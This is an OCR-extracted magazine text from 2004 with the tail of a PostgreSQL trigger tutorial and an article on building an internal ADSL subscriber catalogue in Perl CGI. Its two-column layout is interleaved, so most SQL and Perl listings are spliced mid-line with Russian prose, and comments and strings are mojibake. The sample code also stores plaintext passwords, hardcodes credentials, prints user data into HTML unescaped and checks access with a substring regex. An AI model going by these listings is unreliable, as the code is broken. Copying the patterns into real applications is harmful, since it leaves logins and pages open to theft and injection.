обязательно trigger:
create [or replace] function <èìÿ ôóíêöèè>(<àðãóìåíòû>)
returns trigger as ‘<òåëî ôóíêöèè>’
language ‘plpgsql’
Соответственно команды return, встречающиеся в теле
функции, должны возвращать данные именно этого типа,
который, по сути, является типом RECORD, то есть возвра-
щает запись таблицы. Как правило, в качестве параметра
возврата выступают специальные переменные NEW (новое
значение модифицируемой записи) и OLD (старое значение),
которые передаются в триггерную функцию автоматически.
Вот мы и подошли к решению задачи, поставленной в
начале статьи. Нужные таблицы уже созданы. Заполним их
некоторыми значениями:
45
 администрирование
insert into goods(goods, rest) values(‘Êëàâèàòóðà’, 15); меньшей скорости обработки этот тип рекомендуется за-
insert into goods(goods, rest) values(‘Ìûøü’, 25); действовать только там, где переменная будет применять-
insert into goods(goods, rest) values(‘Ìîíèòîð’, 5);
ся при обработке нескольких таблиц или невозможно ука-
insert into warehouse(goods_id, count) values(1, 30); зать конкретную таблицу.
insert into warehouse(goods_id, count) values(2, 30);
insert into warehouse(goods_id, count) values(3, 7); Аналогично переменная whcount описана с тем же ти-
пом, что и поле count таблицы warehouse. Конкретно в дан-
Далее создаем триггерную функцию, которая будет вы- ном примере это сделано исключительно в целях демонст-
полняться после вставки новой записи в таблицу orders рации такой возможности. Но в реальных проектах типы
(здесь приведено только тело функции): некоторых полей в базе могут меняться по тем или иным
соображениям (например, поле типа char, хранящее IP-ад-
DECLARE реса машин, может быть в будущем изменено на специ-
whcount warehouse.count%type;
rscount integer; альный тип inet), и использование привязки типа перемен-
rsorders integer; ных к типу поля позволит избежать внесения правок во все
row reserved%rowtype;
BEGIN разработанные функции.
--îïðåäåëÿåì êîëè÷åñòâî íà ñêëàäå И теперь создадим сам триггер, связывающий создан-
select count into whcount
from warehouse ную выше функцию с операцией вставки новой записи в
where goods_id = NEW.goods_id; таблицу orders:
if whcount < NEW.count then
--çàïèñûâàåì ñîîáùåíèå î íåõâàòêå òîâàðà create trigger set_order after insert on orders
insert into goods_warnings(goods_id, message, date) execute procedure orders_after_insert();
values(NEW.goods_id,
'Íåäîñòàòî÷íî íà ñêëàäå', now()); Точно так же поступим с триггером для контроля обяза-
--ïðîâåðÿåì, åñòü ëè ïðîñðî÷åííûå
select count(count), sum(count) into rsorders, rscount тельных остатков (здесь все заметно проще):
from reserved
where goods_id = NEW.goods_id and Create or replace function warehouse_after_update()
date < now() - '5 day'::interval; returns trigger as
if rscount + whcount >= NEW.count then 'BEGIN
--îòìåíÿåì ïðîñðî÷åííûé çàêàç if NEW.count < (select rest from goods
for row in select * from reserved where where goods_id = NEW.goods_id) then
date < now() - '5 days'::interval loop
insert into goods_warnings(goods_id, message, date)
update orders set status = 'cancelled' values(NEW.goods_id,
where order_id = row.order_id; \'Îñòàòîê ìåíüøå îáÿçàòåëüíîãî\',
delete from reserved now());
where order_id = row.order_id; end if;
insert into orders_warnings(order_id, return NEW;
message, date) END;'
values(row.order_id, language 'plpgsql';
'Çàêàç îòìåíåí', now());
end loop; Create trigger rest_control after update on warehouse
--äåëàåì íîâóþ çàïèñü â òàáëèöó ðåçåðâà execute procedure warehouse_after_update();
insert into reserved(order_id, goods_id, count, date)
values(NEW.order_id, NEW.goods_id,
NEW.count, NEW.date); На что здесь можно обратить внимание, так это на не-
--çàíîñèì, åñëè ÷òî-òî îñòàëîñü, íà ñêëàä посредственное использование результата выборки в ка-
update warehouse set count =
count + rscount - NEW.count честве переменной (см. конструкцию «select» в скобках).
where goods_id = NEW.goods_id; Естественно, выборка должна возвращать одно значение
else
--çàðåçåðâèðîâàòü íå óäàëîñü – çàíîñèì ñîîòâåòñòâóþùèå ïîìåòêè требуемого типа. Ну и поскольку благодаря этому в функ-
update orders set status = 'not reserved' ции удалось обойтись без переменных, секцию DECLARE
where order_id = NEW.order_id;
insert into orders_warnings(order_id, за ненадобностью можно опустить.
message, date) И теперь приступаем к проверке работоспособности.
values(NEW.order_id,
'Òîâàð ïî çàêàçó íå çàðåçåðâèðîâàí', now()); Сначала оформим «штатный» заказ:
end if;
else insert into orders(customer, goods_id, count, price, date)
--óìåíüøàåì êîëè÷åñòâî íà ñêëàäå values('Èâàíîâ Èâàí Èâàíîâè÷', 3, 1, 7302.00, '2004-07-15');
update warehouse set count = count - NEW.count
where goods_id = NEW.goods_id;
--äåëàåì çàïèñü â òàáëèöå ðåçåðâà Убеждаемся, что на складе количество мониторов умень-
insert into reserved(order_id, goods_id, count, date) шилось, записи в таблицах заказов и резерва появились,
values(NEW.order_id, NEW.goods_id, NEW.count
NEW.date); предупреждений нет. Теперь закажем сразу 4 монитора:
end if;
return NEW; insert into orders(customer, goods_id, count, price, date)
END; values('Ãîðýëåêòðîñåòè', 3, 4, 7302.00, '2004-07-16');

Обратите внимание на применение нами переменной
reserved%rowtype – она описывает запись таблицы reserved,
которую мы в дальнейшем используем для организации
цикла (конструкция «for row in select ... loop») по записям,
выбранным из этой таблицы. С тем же успехом можно было
бы использовать переменную типа RECORD, однако из-за
Чтобы проверить правильность отмены просроченных
заказов, даты выше были указаны прошедшие. Если сей-
час заказать 10 мониторов, то заказ будет помечен как «not
reserved», и соответствующая запись появится в таблице
предупреждений. Поскольку даже с учетом просроченных
заказов 10 мониторов никак не набирается, то и аннулиро-

46

ваться ничего не будет. А вот если заказать 3 монитора, то
с учетом высвобождения просроченного резерва (5 штук)
нужное количество набирается и даже 2 монитора будут
возвращены на склад. В таблице предупреждений появит-
ся 4 записи – две об аннулировании просроченных зака-
зов, одна о том, что имела место нехватка товара на скла-
де, и одна о том, что остаток мониторов (4 шт.) меньше
обязательного минимума (5 шт.).
Итак, поставленная в начале статьи задача решена: офор-
мление заказа, включая такой «интеллектуальный» элемент,
как попытка высвободить нужный товар из просроченного
резерва, выполняется по единственному запросу к СУБД.
Очевидно, что если в функцию придется внести изменения
(например, будет принято решение, что резерв должен хра-
ниться минимум 7 дней, а не 5), то они потребуются только
на стороне СУБД. Клиенты (сколько бы их ни было) будут
работать без каких-либо изменений. Кроме того, если одна
из операций даст сбой (например, не удастся сделать за-
пись в таблицу резерва), то произойдет «откат» всех осталь-
ных операций, выполненных при отработке функции, посколь-
ку функция исполняется как единый транзакционный блок.
Несколько слов о среде разработки. Конечно, никто не
запрещает использовать для этого терминал psql, но малей-
Ðèñóíîê 2
№10(23), октябрь 2004
администрирование
шее изменение в функции потребует полностью набрать всю
команду create function. Графический клиент PgAdmin суще-
ственно упрощает работу с функциями, однако некоторые
недоработки интерфейса (невозможность сохранить изме-
нения, не закрыв при этом окно редактора функции; отсут-
ствие запоминания последнего размера окна – отрегулиро-
вав окно редактора один раз, при следующем его открытии
придется делать все заново) способны сильно потрепать
нервы. Поэтому лучше запастись более «продвинутым» при-
ложением, например, средой разработки EMS PostgreSQL
Manager (http://www.ems-hitech.com/index.phtml). Данная про-
грамма (рис. 2) предоставляет очень широкие возможности
по разработке и отладке функций PostgreSQL, однако, как
это ни печально, стоит денег. 30-дневную пробную версию
можно загрузить с сайта разработчика.
На этом я думаю завершить серию обзорных статей по
PostgreSQL. В дальнейшем, безусловно, вопросы работы с
этой СУБД будут рассматриваться довольно часто, но уже
в плане конкретных задач. На мой взгляд, разработчикам
PostgreSQL удается очень удачно сочетать динамичное раз-
витие продукта с определенной долей осторожности и кон-
серватизма, что, в конечном итоге, делает эту СУБД весь-
ма удачным выбором.
47
 администрирование
ВНУТРЕННИЙ ВЕБ-СЕРВЕР
Очень часто системному администратору, работающему в
небольшой фирме, попутно приходится разрабатывать про-
граммы для внутренних нужд компании. Требования к по-
добному ПО, как правило, невысоки, но это с лихвой ком-
пенсируется очень сжатыми сроками, отводимыми на раз-
работку. Освоить Delphi для того, чтобы на предприятии по-
явилась программа-каталог пользователей Интернета или
программа, формирующая материальные отчеты, было бы
просто замечательно. Но времени на подобные вещи, как
обычно, не хватает. И потому приходится идти другим пу-
тём. В данной статье я хочу рассказать о своем опыте ис-
пользования веб-сервера для решения подобных задач.
Почему был выбран столь экзотический способ? Во-
первых, Perl я знаю несколько лучше, чем Delphi или C++
Builder. Во-вторых, такой подход без лишних усилий позво-
ляет создавать клиент-серверные приложения, с которыми
одновременно могут работать сотни пользователей, не за-
ботясь о разработке клиентских программ – с этой ролью
отлично справится любой браузер. В-третьих, налицо неза-
висимость от конкретных платформ и операционных сис-
тем – для сервера достаточно, чтобы на нем мог работать
48
конкурсная статья
Что админу хорошо, то пользователю – смерть.
Народная мудрость
СЕРГЕЙ СУПРУНОВ
Apache + Perl (вы можете использовать и другую связку),
от клиентов требуется лишь поддержка какого-нибудь гра-
фического обозревателя. И наконец, времени на разработ-
ку и сопровождение ПО в данном случае затрачивается за-
метно меньше, чем при «традиционных» способах.
Для наглядности рассмотрим в общих чертах процесс
разработки незатейливого приложения: каталога пользо-
вателей ADSL, в который будут заноситься сведения об
абонентах (фамилия, адрес, номер телефона), параметры
конфигурации (IP-адреса, интерфейсы, номера PVC), па-
раметры линии (длина, диаметр жилы, сопротивление шлей-
фа) и т. д.
В целях экономии места будет рассмотрена только пер-
вая функция (работа со сведениями об абонентах). Очень
многие детали придется опустить. Так, не будут рассмот-
рены особенности Perl-модулей, подключаемых к нашим
сценариям, способы работы с базой данных и т. д. Читате-
лю понадобятся, по крайней мере, базовые знания Perl,
HTML, PostgreSQL (или какой-нибудь другой СУБД). Если
материал статьи окажется вам интересен, я постараюсь раз-
ложить все по полочкам в следующих статьях, оставляйте

ваши отзывы на форуме журнала «Системный админист-
ратор».
Подготовительные мероприятия
Итак, прежде всего нам нужно собрать сервер. Я остано-
вил свой выбор (поскольку все это уже есть и работает) на
следующем ПО (правда, кое-что из этого списка уже пора
бы обновить):
! ОС: FreeBSD 5.2
! Веб-сервер: Russian Apache 1.3.29
! Язык программирования: Perl 5.6.1
! СУБД: PostgreSQL 7.4.2
Рассматривать установку и конфигурирование всего
этого я не буду – все довольно подробно описано и на стра-
ницах журнала, и на бескрайних просторах Интернета. Вы-
бор именно этого ПО – вопрос, скорее, личных предпочте-
ний, поскольку по каждому из пунктов можно привести мас-
су как положительных, так и отрицательных доводов. В кон-
це концов с тем же успехом (с поправкой на более высокие
требования к ресурсам и вопросам безопасности) можно
использовать и связку «Windows2003 – IIS – ASP – MSSQL».
Структура базы данных и доступ к СУБД
Начнем разработку с определения структуры БД. Нужно
заметить, что это итерационный процесс, то есть обычно
при разработке сценариев выясняется, что база данных
должна быть несколько иной, потом корректировки вновь
вносятся в код сценариев, снова исправляется БД и так до
тех пор, пока разработчик не осознает, что эффект от даль-
нейшего улучшения уже не окупает затрат на исправления.
Но мы остановимся на первой итерации, тем более что наша
задача – показать сам принцип.
Итак, создадим БД с именем adsl, владельцем которой
будет пользователь adsluser с паролем password. В ней нам
потребуются следующие таблицы:
! sessions – информация сеансов пользователей (см. да-
лее):
! id char(32) – идентификатор сессии;
! a_session text – информация сессии;
! login char(12) – имя пользователя;
! password varchar – пароль пользователя.
! users – информация об абонентах ADSL:
! uid serial – уникальный идентификатор абонента;
! name varchar – фамилия, имя, отчество;
! address varchar – адрес проживания;
! phone char(7) – номер телефона.
! dslam– информация о ADSL-портах:
! uid serial – уникальный идентификатор порта;
! userid numeric – идентификатор подключенного на
порт абонента;
! num char(10) – номер порта (в виде nDSLAM/nBOARD/
nPORT);
! vlan numeric(4) – номер VLAN, соответствующей
ADSL-порту;
! vpi numeric(3) – номер VPI;
! vci numeric(3) – номер VCI, присвоенный клиенту;
! interface char(15) – имя интерфейса, на котором бу-
дет вестись учет трафика;
№10(23), октябрь 2004
администрирование
! ipaddress inet – IP-адрес, сопоставленный с данным
портом.
! lines – характеристики линий связи:
! uid serial – уникальный идентификатор линии;
! portid numeric – идентификатор порта DSLAM, на ко-
торый подключена эта линия;
! length numeric(5) – длина линии в метрах;
! diameter numeric(2,1) – диаметр жилы в миллиметрах;
! impedance numeric(4) – сопротивление шлейфа в
Омах.
И еще одна таблица для хранения служебной информа-
ции:
! st_modules – список функциональных модулей:
! name char(20) – имя модуля;
! description varchar – описание модуля;
! ink varchar – ссылка на сценарий модуля;
! allow char(12)[] – массив, хранящий имена пользова-
телей, которым позволено работать с данным моду-
лем;
! orderby numeric(2) – данное поле задает порядок вы-
вода модулей на экран.
В данном случае мы минимально задействуем расши-
ренные возможности PostgreSQL, что позволит почти ни-
чего не менять при использовании, например, MySQL.
Шаблон сайта – модульный подход
Поскольку переписывать все сначала при необходимости
расширить функциональность нашего приложения – заня-
тие не очень интересное, применим модульный подход.
Пусть основной сценарий отвечает только за предоставле-
ние доступа к имеющимся функциям, а каждая функция
будет реализована отдельным скриптом. Кроме того, час-
то используемые операции будем выносить в наш модуль
My::Insite.
Выглядеть базовый сценарий будет примерно так:
#!/usr/bin/perl –w
#-------------------------------------------- adsl.cgi
use My::Insite;
# Ïîäêëþ÷àåìñÿ ê ÁÄ è ñîçäàåì îáúåêò CGI äëÿ ðàáîòû ñ HTTP
$dbh = My::Insite->DBConnect('adsl', 'adsluser', 'password');
$cgi = My::Insite->CGIStart();
# Ñ÷èòûâàåì çíà÷åíèå HTTP-ïàðàìåòðà «action»
($action = $cgi->param('action')) or $action = '';
# Âûïîëíÿåì ïðîöåäóðó âûõîäà
if($action eq 'logoff') { &doLogoff; }
# Ïðîöåäóðà àâòîðèçàöèè
if($action eq 'logon') {
$savedLogin = $cgi->param('login');
$savedPassword = $cgi->param('password');
# èùåì ñåññèþ äëÿ çàÿâëåííîãî ëîãèíà
($sSessId, $sPassword) = $dbh->selectrow_array('
SELECT id, password FROM sessions WHERE login=?
', undef, $savedLogin);
# åñëè íå íàøëè – ïîâòîðíûé çàïðîñ àâòîðèçàöèè
if(!$sSessId) { &doLogon('Failed'); }
# åñëè ñåññèÿ åñòü, íî ïàðîëü íå ñîîòâåòñòâóåò ââåäåííîìó,
# ïîâòîðíûé çàïðîñ àâòîðèçàöèè
if($sPassword ne $savedPassword) { &doLogon('Wrong'); }
# Åñëè âñå íîðìàëüíî – ñîõðàíÿåì èäåíòèôèêàòîð ñåññèè â cookie
$cookie = $cgi->cookie(-name => 'sessid', -value => $sSessId);
49
администрирование
print $cgi->header(-cookie => $cookie); print '</HEADER>';
print 'Àâòîðèçàöèÿ âûïîëíåíà óñïåøíî.'; print 'Äî íîâûõ âñòðå÷!';
print " <A href='adsl.cgi'>Ïðîäîëæèòü...</A>"; exit;
exit; }
}

# action íå èìååò çíà÷åíèÿ, ïûòàåìñÿ èçâëå÷ü èç cookie
# èäåíòèôèêàòîð ñåññèè
$sessId = $cgi->cookie('sessid');
# Åñëè áåçóñïåøíî – óõîäèì íà àâòîðèçàöèþ
if(!$sessId) { &doLogon('First'); }
# Åñëè sessId åñòü, ïûòàåìñÿ ïîëó÷èòü ïîëüçîâàòåëÿ ýòîé ñåñ-
ñèè
($sLogin) = $dbh->selectrow_array('
SELECT login FROM sessions WHERE id=?;
', undef, $sessId);
# Åñëè óäà÷íî – îòêðûâàåì ñåññèþ, èíà÷å – íà àâòîðèçàöèþ
if($sLogin) {
$session = My::Insite->SessOpen($dbh, $sessId);
} else { &doLogon('Fialed'); }
# Âûáèðàåì èç ÁÄ è âûâîäèì íà ýêðàí ñïèñîê ìîäóëåé
print $cgi->header;
$sth = $dbh->prepare('SELECT * FROM st_modules ORDER BY
orderby;');
$sth->execute;
print "<P align='right'>Âû âîøëè ïîä èìåíåì $sLogin | ";
print ' <A href="?action=logoff">Âûõîä</A></P>';
while($rhash = $sth->fetchrow_hashref) {
# Ïå÷àòàòü áóäåì òîëüêî òå ìîäóëè, äëÿ êîòîðûõ â ïîëå
allow
# åñòü èìÿ âîøåäøåãî ïîëüçîâàòåëÿ
if($$rhash{allow} =~ m($sLogin)) {
print "<DT><A href='$$rhash{link}'> ↵
$$rhash{name}</A>";
print "<DD>$$rhash{description}<BR>";
} adsl-admin.cgi | Модуль администратора
} (записей: 3)
Задача данного сценария – выполнить авторизацию
пользователя и предоставить ему список доступных для ра-
боты модулей. Управление поведением сценария осуществ-
ляется с помощью переменной «action», которая может иметь
одно из следующих значений: logoff (закрыть сеанс), logon
(выполнить процедуру авторизации, в ходе которой прове-
ряется правильность пароля и открывается сессия, соответ-
ствующая данному пользователю, о чем делается запись в
файлах cookie). Пустое значение данной переменной позво-
лит вывести на экран перечень доступных модулей.
Список модулей хранится в БД, в таблице st_modules,
откуда он выбирается и выводится на экран, причем отобра-
жаются только те модули, для которых в поле allow содер-
жится имя текущего пользователя. Больше ничего от глав-
ного сценария не требуется. Для подключения к приложе-
нию очередного модуля достаточно поместить в папку cgi-
bin реализующий его сценарий и добавить запись в таблицу
st_modules. То есть в этой таблице будет что-то похожее:
adsl=> select link, name, allow from st_modules order by orderby;
link | name | allow
---------------------+------------------------------------------+----------------------
adsl-users.cgi | Абоненты ADSL | {"admin","operator"}
adsl-dslam.cgi | Конфигурация DSLAM | {"admin"}
| {"admin"}

# Âñå çàêðûâàåì (â ïðèíöèïå ýòî íå îáÿçàòåëüíî – âñå Результат работы сценария adsl.cgi представлен на ри-
# è òàê çàêðîåòñÿ) сунках 1 и 2.
My::Insite->SessClose($session);
My::Insite->DBDisconnect($dbh);
exit;
#-------------------------------------------- ïîäïðîãðàììû
sub doLogon { # ïîäïðîãðàììà àâòîðèçàöèè
$status = shift @_;
if($status eq 'Wrong') {
$status = Íåïðàâèëüíûé ëîãèí èëè ïàðîëü.';
} elsif($status eq 'Failed') {
$status = Îøèáêà ïîäêëþ÷åíèÿ äàííîãî ↵
ïîëüçîâàòåëÿ.';
} else {
$status = Ââåäèòå ëîãèí è ïàðîëü:';
}
print $cgi->header();
print <<__HTML__;
<CENTER><H3>$status</H3><FORM method="POST">
<TABLE border="1"><TR><TD><TABLE> Ðèñóíîê 1
<INPUT type="hidden" name="action" value="logon">
<TR><TD>Login:<TD><INPUT type="text" name="login"
value="">
<TR><TD>Password:
<TD><INPUT type="password" name="password" value="">
<TR><TD colspan="2" align="center">
<INPUT type="submit" value="Âîéòè">
</TABLE></TABLE></FORM></CENTER>
__HTML__

exit;
}

sub doLogoff { # ïîäïðîãðàììà çàêðûòèÿ ñåàíñà

# Çàïèñûâàåì cookie ñ èñòåêøèì «ñðîêîì ãîäíîñòè»
# (îòðèöàòåëüíîå çíà÷åíèå ïàðàìåòðà expire), ÷òî óíè÷òîæèò
# cookie â ïàìÿòè
$cookie = $cgi->cookie(-name => 'sessid',
-value => '',
-expires => '-1d');
print $cgi->header(-cookie => $cookie);
print '<HEADER>';
print '<META http-equiv="refresh" ↵
content="1;url=adsl.cgi">'; Ðèñóíîê 2

50
 администрирование
Модуль My::Insite в моем случае будет размещаться по Доступ на сайт и Apache::Session
такому адресу: /usr/local/lib/perl5/site_perl/5.6.1/My/Insite.pm. Если вы доверяете всем сотрудникам или собираетесь ог-
Узнать пути, по которым Perl ищет подключаемые модули, раничивать доступ к сайту «низкоуровневыми» средства-
позволяет специальная переменная @INC: ми вроде брандмауэра для ограниченного круга лиц с рав-
ными правами, то этот пункт можно пропустить. В общем
#!/usr/bin/perl же случае желательно организовать проверку «подлинно-
#-------------------- testpath.pl
сти» пользователя и соответствующим образом ограничи-
$, = "\n"; вать его права в нашей программе. В серьезных случаях
print @INC;
exit; можно дополнительно организовать SSL-шифрование, но
сейчас обойдемся без этого, чтобы не отвлекаться от ос-
На моей машине результат был получен следующий: новной цели.
Пароли для простоты хранить и передавать будем в яв-
$ ./testpath.pl ном виде, признак правильного входа в приложение, а за-
/usr/local/lib/perl5/site_perl/5.6.1/mach
/usr/local/lib/perl5/site_perl/5.6.1 одно и некоторые персональные настройки будем хранить,
/usr/local/lib/perl5/site_perl используя механизм сессий. В Perl это выглядит несколько
/usr/local/lib/perl5/5.6.1/BSDPAN
/usr/local/lib/perl5/5.6.1/mach сложнее, чем в PHP, зато проще сделать именно то, что
/usr/local/lib/perl5/5.6.1 нужно. Для работы понадобится модуль Apache::Session.
Если на вашей системе такого нет, для FreeBSD его, как и
Код модуля My::Insite представлен ниже: большинство других модулей, можно установить из коллек-
ции портов:
package My::Insite;
# cd /usr/ports/www/p5-Apache-Session
use CGI; # make install
use DBI;
use Apache::Session::Postgres;
Более универсальный путь, пригодный практически для
sub CGIStart { всех систем – использование архива CPAN. Этот метод опи-
return CGI->new;
} сан на страницах руководства man perlmodinstall.
Так как база данных у нас есть, целесообразно для хра-
sub DBConnect {
my($obj, $dbName, $dbUser, $dbPwd) = @_; нения сессионной информации использовать именно ее. По-
return DBI->connect('dbi:Pg:dbname='.$dbName, ↵ этому будем использовать подмодуль Apache::Session::
$dbUser, $dbPwd);
} Postgres. Поскольку число пользователей нашего приложе-
ния ограничено и все они известны, то имеет смысл для
sub DBDisconnect {
my($obj, $dbh) = @_; каждого из них заранее создать сессию, в которой будут
$dbh->disconnect; храниться все пользовательские данные, и при авториза-
return(1);
} ции подключать именно ее. Такой подход позволит не бес-
покоиться об удалении старых сессий и о хранении иденти-
sub SessOpen {
my($obj, $dbh, $sessId) = @_; фикатора сессии между сеансами. Вручную создавать но-
tie %session, 'Apache::Session::Postgres', $sessId, вую сессию не очень удобно, поэтому будем использовать
{Handle => $dbh, LockHandle => $dbh};
return(bless(\%session, $obj)); такой небольшой сценарий:
}
#!/usr/bin/perl –w
sub SessClose { #------------------------------------------ adsl-adduser.pl
my($obj, $session) = @_;
untie(%$session); use DBI;
return(1); use Apache::Session::Postgres;
}
$login = $ARGV[0]; # ïåðâûé àðãóìåíò – èìÿ
return(1); $password = $ARGV[1]; # âòîðîé – ïàðîëü

Как видите, сюда вынесены функции подключения к БД, # Çàïðàøèâàåì âñå, ÷òî íå ïåðåäàíî â àðãóìåíòàõ
if(!$login) {
работы с сессиями и т. д. print 'Enter login: ';
Может показаться, что в некоторых функциях нет смыс- chomp($login = <>);
}
ла. Например, зачем создавать CGIStart, которая только и
делает, что вызывает функцию new() модуля CGI? Не про- if(!$password) {
print 'Enter password: ';
ще ли вызывать эту функцию самому и не захламлять мо- chomp($password = <>);
дуль? }
А теперь представьте, что вы решили вместо модуля CGI # Ñîçäàåì íîâóþ ñåññèþ è ñðàçó çàêðûâàåì
перейти на более функциональный. Что проще – перепи- $dbh = DBI->connect('dbi:Pg:dbname=adsl', 'adsluser', ↵
'password');
сывать все имеющиеся сценарии или изменить одну функ- tie %session, 'Apache::Session::Postgres', undef,
цию в My::Insite? {Handle => $dbh, LockHandle => $dbh};
untie %session;
Думаю, в этом модуле все понятно без комментариев.
Если что непонятно – всегда под рукой man DBI, man CGI, # Â çàïèñü â òàáëèöå sessions, ñîîòâåòñòâóþùåé íàøåìó
# ñåàíñó, äîáàâëÿåì èìÿ ïîëüçîâàòåëÿ è ïàðîëü, ââåäåííûå âûøå
man Apache::Session. $pre = $dbh->prepare('

№10(23), октябрь 2004 51

 администрирование
update sessions else { print 'Íå ìîãó âûïîëíèòü: '.$action; }
set login = ?, password = ?
where login is null; My::Insite->SessClose($session);
'); My::Insite->DBDisconnect($dbh);
$pre->execute($login, $password); exit;
$dbh->disconnect;
exit; #------------------------------------- subroutines
sub showUsers { # ïîäïðîãðàììà âûâîäà ñïèñêà àáîíåíòîâ
При желании этот модуль можно сделать CGI-скриптом $sth = $dbh->prepare('SELECT uid, name, address, phone
и организовать доступ к нему через модуль администриро- FROM users ORDER BY name;');
$sth->execute;
вания, подключаемый к нашему приложению, как и все ос-
тальные. print '<TABLE><TR><TD><H3>Àáîíåíòû</H3>';
print '<TD align="right"><A href="adsl.cgi">Ãëàâíàÿ</A>';
Ну и раз информация сессий будет необходима нам в print '<TR><TD colspan="2">';
каждом модуле, то процедуры работы с ней вынесены в наш print '<TABLE><TR><TD align="right">';
print '[ <A href="?action=user&type=add">
модуль My::Insite. Как все это будет работать – смотрите в Äîáàâèòü íîâîãî àáîíåíòà</A> ]';
листингах, приведенных в статье. print '<TR><TD><TABLE border=1><TR bgcolor=#AAAAFF>
<TH>Àáîíåíò
<TH>Àäðåñ
Взаимодействие с БД <TH>Òåëåôîí
<TH>Äåéñòâèå;
Для работы с базой данных будем использовать Perl-мо-
дуль DBI с драйвером DBD::Pg. Данный модуль и нужный while(@res = $sth->fetchrow_array) {
$oper = ($res[6] eq 'I'?'inlager':'outlager');
драйвер можно установить как из портов, так и из CPAN. print "<TR><TD>$res[1]<TD>$res[2]<TD>$res[3]<TD>
Функции открытия и закрытия соединения вынесены в мо- [ <A href='?action=user&type=update&uid=$res[0] ↵
'>Èçìåíèòü</A> ] ::
дуль My::Insite, остальное смотрите в коде конкретных мо- [ <A href='?action=user&type=delete&uid=$res[0] ↵
дулей. '>Óäàëèòü</A> ]";
}
print '</TABLE><TR><TD align="right">';
Модуль обработки информации print '[ <A href="?action=user&type=add">Äîáàâèòü ↵
íîâîãî àáîíåíòà</A> ]';
об абоненте print '</TABLE></TABLE>';
Вот мы и добрались до первого «рабочего» модуля. В его return;
}
рамках нам нужно решить следующие задачи: вывод на
экран списка абонентов, ввод нового абонента, удаление sub userForm { # âûâîäèò ôîðìó äëÿ ìàíèïóëÿöèé ñ äàííûìè
$uid = $cgi->param('uid');
абонента, изменение данных. $type = $cgi->param('type');
Код модуля следующий: if($type eq 'add') { $submitName = 'Äîáàâèòü'; }
elsif($type eq 'delete') { $submitName = 'Óäàëèòü'; }
elsif($type eq 'update') { $submitName = 'Èçìåíèòü'; }
#!/usr/bin/perl –w else {
#------------------------------------ adsl-users.cgi print 'Îøèáêà îïåðàöèè: '.$type;
exit;
use My::Insite; }
$header = $submitName.' àáîíåíòà:';
$dbh = My::Insite->DBConnect('adsl', 'adsluser', 'password');
$cgi = My::Insite->CGIStart(); if($type ne 'add') {
$action = $cgi->param('action'); ($name, $address, $phone) = $dbh->selectrow_array('
SELECT name, address, phone FROM users WHERE uid = ?;
# Ïûòàåìñÿ ñ÷èòàòü èç cookie èäåíòèôèêàòîð ñåññèè, ', undef, $uid);
# åñëè áåçóñïåøíî – îòïðàâëÿåì íà àâòîðèçàöèþ } else {
$sessId = $cgi->cookie('sessid'); $name = $address = $phone = '';
if(!$sessId) { }
&toLogon;
} if($type eq 'delete') {
$in1 = "<B>$name</B>";
# Îòêðûâàåì ñåññèþ, èëè íà àâòîðèçàöèþ â ñëó÷àå îøèáêè $in2 = "<B>$address</B>";
($sLogin) = $dbh->selectrow_array(' $in3 = "<B>$phone</B>";
SELECT login FROM sessions WHERE id=?; } else {
', undef, $sessId); $in1 = "<INPUT type='text' name='name' ↵
value='$name' size='35'>";
if($sLogin) { $in2 = "<INPUT type='text' name='address' ↵
$session = My::Insite->SessOpen($dbh, $sessId); value='$address' size='35'>";
} else { $in3 = "<INPUT type='text' name='phone' ↵
&toLogon; value='$phone' size='7'>";
} }

# Ïðîâåðÿåì, ìîæíî ëè äàííîìó ïîëüçîâàòåëþ ðàáîòàòü ñ ýòèì print <<__HTML__;

# ìîäóëåì <CENTER><H3>$header</H3>
($allow) = $dbh->selectrow_array(' <FORM method="GET">
SELECT allow FROM st_modules WHERE link=?;', <TABLE border="1"><TR><TD><TABLE>
undef, 'adsl-users.cgi'); <INPUT type="hidden" name="action" value="changeuser">
if($allow !~ m($sLogin)) { <INPUT type="hidden" name="type" value="$type">
&toLogon; <INPUT type="hidden" name="uid" value="$uid">
} <TR><TD>Àáîíåíò: <TD>$in1
<TR><TD>Àäðåñ: <TD>$in2
print $cgi->header; <TR><TD>Òåëåôîí: <TD>$in3
<TR><TD colspan="2"><HR>
# Ðàçáèðàåì âîçìîæíûå äåéñòâèÿ <TR><TD>[ <A href="adsl-users.cgi?action=">Îòìåíà</A> ]
if ($action eq '' ) { &showUsers; } <TD align="right"><INPUT type="submit" ↵
elsif($action eq 'user' ) { &userForm; } value="$submitName">
elsif($action eq 'changeuser') { &changeUser; } </TABLE></TABLE></FORM></CENTER>

52

__HTML__
exit;
}
sub changeUser { # çàïèñü èçìåíåíèé â ÁÄ
$type = $cgi->param('type');
$uid = $cgi->param('uid');
$name = $cgi->param('name');
$address = $cgi->param('address');
$phone = $cgi->param('phone');
if($type eq 'add') {
$res = $dbh->do('
INSERT INTO users(name, address, phone)
VALUES(?, ?, ?);',
undef, $name, $address, $phone);
} elsif($type eq 'delete') {
$res = $dbh->do('DELETE FROM users WHERE uid=?;', ↵
undef, $uid);
} elsif($type eq 'update') {
$res = $dbh->do('
UPDATE users SET name=?, address=?, phone=? WHERE uid=?;
', undef, $name, $address, $phone, $uid);
} else { print 'Îøèáêà îïåðàöèè: '.$type; }
if($res) { print 'Îïåðàöèÿ âûïîëíåíà óñïåøíî. '};
print '<BR><A href="?action=">Ïðîäîëæèòü...</A>';
exit;
} ивать его под конкретные таблицы и поля автоматически в
sub toLogon {
print $cgi->header;
print '<META http-equiv="refresh" ↵
content="1;url=adsl.cgi?account=logon">';
print 'Îøèáêà âõîäà. Ïåðåíàïðàâëåíèå...';
exit;
} делах одного модуля (полный доступ, только чтение).
В данном случае для управления поведением сценария
используется еще одна переменная – type. Если action оп-
ределяет, на какую подпрограмму следует передавать уп-
равление, то type содержит информацию о том, что именно
следует делать в данной подпрограмме.
Сгенерированный приложением список абонентов име-
ет вид, представленный на рисунке 3. Рисунок 4 демонст-
рирует форму для изменения данных.
Ðèñóíîê 3
Ðèñóíîê 4
№10(23), октябрь 2004
администрирование
Прочие модули
Поскольку другие модули ничего нового и интересного в
себе не содержат, отличаясь от приведенного лишь имена-
ми и количеством полей, а также некоторыми интерфейс-
ными особенностями, то и тратить время на их рассмотре-
ние не будем. Добавив соответствующую запись в таблицу
st_modules, вы сделаете новый модуль доступным для ра-
боты.
Что можно изменить?
Как известно, нет предела совершенству. Рассмотренный
здесь пример был очень сильно урезан и упрощен, чтобы
за деталями не потерялась суть и чтобы уложиться в рамки
журнальной статьи. Однако, разрабатывая реальное при-
ложение, имеет смысл сделать некоторые улучшения.
